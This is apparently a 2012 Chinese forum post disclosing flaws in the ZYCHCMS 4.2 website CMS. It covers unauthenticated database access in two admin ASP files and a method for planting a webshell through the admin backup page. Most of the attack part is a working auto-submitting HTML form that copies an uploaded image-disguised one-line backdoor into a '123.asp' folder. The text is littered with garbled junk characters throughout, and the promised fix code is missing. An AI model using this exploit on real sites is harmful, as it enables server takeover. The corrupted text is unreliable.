o1 L* ?4 F/ K$ V! U
6 P9 T: @/ X" n1 H+ Q% ]# s! g
5 s: N" u G Q$ ~
! L. V) t$ P G) w影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
" L$ ?& Q! i5 j, ` ①SQL注射漏洞
& I( i) A9 I5 V" T+ j: ?" o( \ 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
' G% c, f3 n2 k% F2 o 漏洞原因:未过滤
- j8 o5 M7 Z8 b0 T. o, J 漏洞代码:
6 a- \3 Y: K. }8 L 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
7 q1 i# {6 A- o, Y 修复方法:在文件开头加入代码4 a+ b8 G4 z' P/ v& h, ?9 t5 q) \3 u- W
2 v/ Q+ ^( ]& i! @( b
* i9 g; N2 J0 m- M* M
②后台拿WBSHELL
) e9 x2 J" `/ F- x 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。" ^, t9 w% T6 }
这里在网上找了一个,改了下,将就着用。- E% M) @, O1 l" p5 o& {
以下是代码本地提交代码
; B: `* [' t6 ^ s/ G
$ q5 p( @' c" _' e1 @* r2 \' {/ z5 Y7 ~- w- W: s e
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
) S' S. e( ~! b <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>. i( i$ ?5 W8 r Y$ Q( X- u
<tr>
8 f; {, p+ O. K( }1 N5 B2 b8 \ <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>: o; O5 _3 B) a) R* t7 N) `. W
</tr>
6 r. C* W$ m' ^3 f6 N <tr>& t; \' r7 D, _' I! R$ n$ t
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>7 z" K) ^6 `- ?8 V* d# G$ s/ `
</span>
g4 j1 Q7 K, `8 N4 P2 d <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
, T; p; K: H5 I <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
# z8 ~- Y1 v' d/ _4 R <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>+ u8 `) W, U- W5 G2 c6 ?
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d" X- @, I2 B7 [. e; V M) B2 W7 z+ T
<div align=”left”>. I* G. Y! I. c/ A, {' i
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
2 {: V! V/ j! b <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
. w) l3 X& R' p- p5 o% V <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />9 |7 E5 v% ~1 B8 a+ O4 ~1 T* q- ]
</div></td>
3 j% |: Z5 R* O3 F( U) d </tr>
9 D9 n" {8 M3 K <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
d8 |& i3 X# D/ o' e <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
4 O( S$ Q0 d- C; ?2 N# y1 C; p <td class=”td”><div align=”left”>5 _" f/ }: P! p' a0 q, H5 U4 e! v
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />! [" `& D8 U0 ]- Z
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
1 ?- S# K& Z' R* V/ Y6 C4 F$ e </tr>4 [1 T3 e8 u. p6 z9 p6 u
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
O. r3 W4 ? N1 \0 d$ g <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>$ g9 N8 d; M1 K; r
<td class=”td”><div align=”left”>' \! G* C a0 j% _9 x) S1 k8 n' H
<input type=”submit” value=”确定备份” class=”btn”
+ Q1 |4 t3 C; x4 o </div></td>7 X: Y! H9 A7 i. C' O3 ^4 Y
</tr>, p6 a5 Z. n7 ?6 ~6 V& e
</table></td></tr></form>
/ d/ b3 j& A0 Q; V' w/ H! }7 ~ </table>
0 [3 p% l& E4 L2 @* o </td>
5 m9 G9 P' @$ s7 D( c </tr>3 X( k% @9 C& V% P% S/ D& B( g$ p" M4 h
</table>
7 X8 @+ D$ V$ ^3 X# O6 v2 C% {# Q <script>
0 I) d5 v8 _+ M0 [ document.all.add.submit();/ K1 D( V$ f @
</script>
' l8 v9 [/ ]3 }1 W3 |$ a' R
2 f) c, b+ A J% k4 f9 W+ P5 c3 c* q; _* G
" z O: q" e- Z$ p N. a- ~+ ?; r; ~; Q+ A( N8 c4 g
9 y, {( {, O6 \
' \0 v5 Z4 q: q/ n
4 b% k; ~: T o3 s: N; ?
( U. ]+ }+ ?9 C; F: T( M+ l& b% n. F* Y3 C
. s q2 `( D- v |
发表于 2012-9-10 21:09:51
收藏
支持
反对